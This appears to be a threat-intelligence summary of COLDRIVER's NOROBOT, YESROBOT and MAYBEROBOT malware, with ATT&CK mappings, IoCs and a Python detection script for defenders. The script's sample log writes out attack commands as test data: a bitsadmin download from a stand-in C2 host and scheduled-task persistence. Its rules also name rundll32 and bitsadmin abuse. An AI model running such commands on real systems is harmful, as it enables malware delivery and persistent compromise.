COLDRIVER New Malware Toolset Expansion

Researchers observed the Russian APT COLDRIVER rapidly replacing LOSTKEYS with the new malware families NOROBOT, YESROBOT, and MAYBEROBOT, used to target high-value individuals in NGOs, policy advisory roles, and dissident communities. The group refined its delivery chain (a ClickFix CAPTCHA lure that has the victim run iamnotarobot.dll via rundll32), rotated infrastructure, and shifted from a Python-based to a PowerShell-based backdoor to gain flexibility and evade detection. #COLDRIVER #NOROBOT

Keypoints

  • COLDRIVER (aka UNC4057/Star Blizzard/Callisto) quickly transitioned from LOSTKEYS to NOROBOT, YESROBOT, and MAYBEROBOT within days of LOSTKEYS disclosure.
  • Initial infection uses a refined COLDCOPY “ClickFix” lure posing as a CAPTCHA page, with text such as “humanCheck”, that leads the victim to execute a malicious DLL named iamnotarobot.dll via rundll32.
  • NOROBOT acts as the downloader, fetching stages (e.g., self-extracting RAR with Python 3.8) and storing cryptographic keys in the registry with persistence via scheduled tasks.
  • YESROBOT is a Python 3.8-based backdoor that encodes system information in the HTTPS User-Agent header; it was constrained by the limits of its Python command set and was therefore short-lived.
  • MAYBEROBOT is a PowerShell-based backdoor with an extensible protocol supporting file download/execute, cmd execution, and PowerShell block execution, improving operational flexibility.
  • COLDRIVER continuously refines NOROBOT (infrastructure rotation, filename changes, cryptographic key splitting) while maintaining MAYBEROBOT stability, balancing flexibility and operator complexity.
  • Targets include high-profile Western-aligned individuals and organizations—NGOs, think tanks, journalists, former intelligence/military officials—primarily for espionage and credential theft.

MITRE Techniques

  • [T1218] Signed Binary Proxy Execution – rundll32.exe used to execute the malicious DLL iamnotarobot.dll via the ClickFix lure (“…iamnotarobot.dll… executed through rundll32”).
  • [T1204] User Execution – Victim social engineering with a ClickFix CAPTCHA-style lure prompts users to run a malicious file (“…posing as a CAPTCHA verification to trick users into executing a malicious DLL…”).
  • [T1105] Ingress Tool Transfer – NOROBOT downloads subsequent stages (self-extracting RAR, Python runtime, scripts) from hardcoded C2 (“…retrieving subsequent stages from a hardcoded command-and-control (C2) server”).
  • [T1547] Boot or Logon Autostart Execution (Scheduled Task) – Persistence established via scheduled tasks (“…established persistence via scheduled tasks”).
  • [T1573] Encrypted Channel – YESROBOT communicates to C2 over HTTPS and encodes system information in the User-Agent (“…communicates via HTTPS to a C2 server, encoding system information in the User-Agent header”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – MAYBEROBOT is a PowerShell-based backdoor executing PowerShell blocks and commands (“…MAYBEROBOT, a PowerShell-based backdoor… supports … executing PowerShell blocks”).
  • [T1027] Obfuscated Files or Information – NOROBOT and associated stages use complex cryptography and key-splitting to hinder analysis (“…reintroducing complex cryptographic key splitting to hinder analysis”).

Indicators of Compromise

  • [File Hash] samples associated with COLDRIVER activity – bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f, 2e74f6bd9bf73131d3213399ed2f669ec5f75392de69edf8ce8196cd70eb6aee (and 6 more hashes).
  • [File Name] delivery and payload filenames – iamnotarobot.dll (malicious DLL executed via rundll32), libsystemhealthcheck.py (component containing AES key material).
  • [Tools/Commands] download and execution mechanisms – bitsadmin used to retrieve files (e.g., downloading libsystemhealthcheck.py and libcryptopydatasize.py); scheduled tasks used for persistence.
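The MITRE mappings and indicators above translate directly into process-creation detections: rundll32 loading a DLL named iamnotarobot.dll, bitsadmin pulling Python components, schtasks registering persistence, plus matching of the published hashes and filenames. The script below is an added example written for this summary, not code from the PolySwarm write-up or from any detection product. It assumes a simple key=value log format and the sample lines are constructed for illustration (the C2 host c2.example.invalid, the task name SystemHealthCheck and the non-IoC hashes are placeholders); the two SHA-256 values and the filenames come from the indicator list above, and the ATT&CK IDs are the ones listed in the summary.

```python
"""Sweep process-creation log lines for the NOROBOT delivery chain
summarised above (rundll32 + iamnotarobot.dll, bitsadmin downloads,
scheduled-task persistence) and for the published file IoCs."""
import re
from dataclasses import dataclass

# File hashes and filenames taken from the Indicators of Compromise list above.
KNOWN_HASHES = {
    "bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f",
    "2e74f6bd9bf73131d3213399ed2f669ec5f75392de69edf8ce8196cd70eb6aee",
}
KNOWN_FILENAMES = {"iamnotarobot.dll", "libsystemhealthcheck.py", "libcryptopydatasize.py"}


@dataclass(frozen=True)
class Finding:
    line_no: int   # index of the log line that fired
    rule: str      # rule name
    technique: str # ATT&CK id as given in the summary, or "IOC" for hash/filename hits


# Behavioural rules over the command line. The schtasks rule is a low-confidence
# signal on its own and is meant to be correlated with the other hits on the host.
RULES = [
    ("rundll32_iamnotarobot", "T1218",
     re.compile(r"\brundll32(\.exe)?\b.*\biamnotarobot\.dll\b", re.I)),
    ("bitsadmin_py_download", "T1105",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*\.py\b", re.I)),
    ("schtasks_create", "T1547",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)),
]

# key=value pairs; values may be double-quoted (needed for paths and command lines with spaces)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> dict:
    """Parse one key=value log line (assumed format) into a dict."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in KV_RE.findall(line)}


def scan(lines) -> list:
    """Return one Finding per (line, rule) that matches."""
    findings = []
    for i, line in enumerate(lines):
        fields = parse_line(line)
        cmd = fields.get("cmdline", "")
        for name, technique, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(i, name, technique))
        if fields.get("sha256", "").lower() in KNOWN_HASHES:
            findings.append(Finding(i, "ioc_hash", "IOC"))
        if any(fn in cmd.lower() for fn in KNOWN_FILENAMES):
            findings.append(Finding(i, "ioc_filename", "IOC"))
    return findings


def rules_hit(lines) -> dict:
    """Map line index -> set of rule names that fired, for quick triage."""
    hits = {}
    for f in scan(lines):
        hits.setdefault(f.line_no, set()).add(f.rule)
    return hits


# Constructed sample log: three lines mimicking the chain, two benign lines.
SAMPLE_LOG = [
    r'2025-10-20T09:41:03Z host=ws01 user=jdoe image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe C:\Users\jdoe\Downloads\iamnotarobot.dll,#1" sha256=bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f',
    r'2025-10-20T09:41:09Z host=ws01 user=jdoe image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin.exe /transfer hc https://c2.example.invalid/libsystemhealthcheck.py C:\Users\jdoe\AppData\Local\Temp\libsystemhealthcheck.py" sha256=0000000000000000000000000000000000000000000000000000000000000000',
    r'2025-10-20T09:41:15Z host=ws01 user=jdoe image=C:\Windows\System32\schtasks.exe cmdline="schtasks.exe /create /sc minute /mo 15 /tn SystemHealthCheck /tr C:\Users\jdoe\AppData\Local\Temp\pyrun\python.exe" sha256=1111111111111111111111111111111111111111111111111111111111111111',
    r'2025-10-20T10:02:44Z host=ws02 user=asmith image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe shell32.dll,Control_RunDLL" sha256=2222222222222222222222222222222222222222222222222222222222222222',
    r'2025-10-20T10:03:10Z host=ws02 user=asmith image="C:\Program Files\Google\Chrome\Application\chrome.exe" cmdline="chrome.exe --type=renderer" sha256=3333333333333333333333333333333333333333333333333333333333333333',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule} [{f.technique}]")
```

Running the script reports three hits on the first line (behavioural rule, hash IoC and filename IoC), two on the bitsadmin line and the scheduled-task rule alone on the third; the legitimate rundll32 and Chrome lines stay silent. Because COLDRIVER rotates filenames and infrastructure for NOROBOT, the behavioural rules (rundll32 executing a user-writable DLL, bitsadmin fetching script files, a new scheduled task shortly after) are the durable part of this detection; the hash and filename matches will age out first.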


Read more: https://blog.polyswarm.io/coldriver-updates-its-arsenal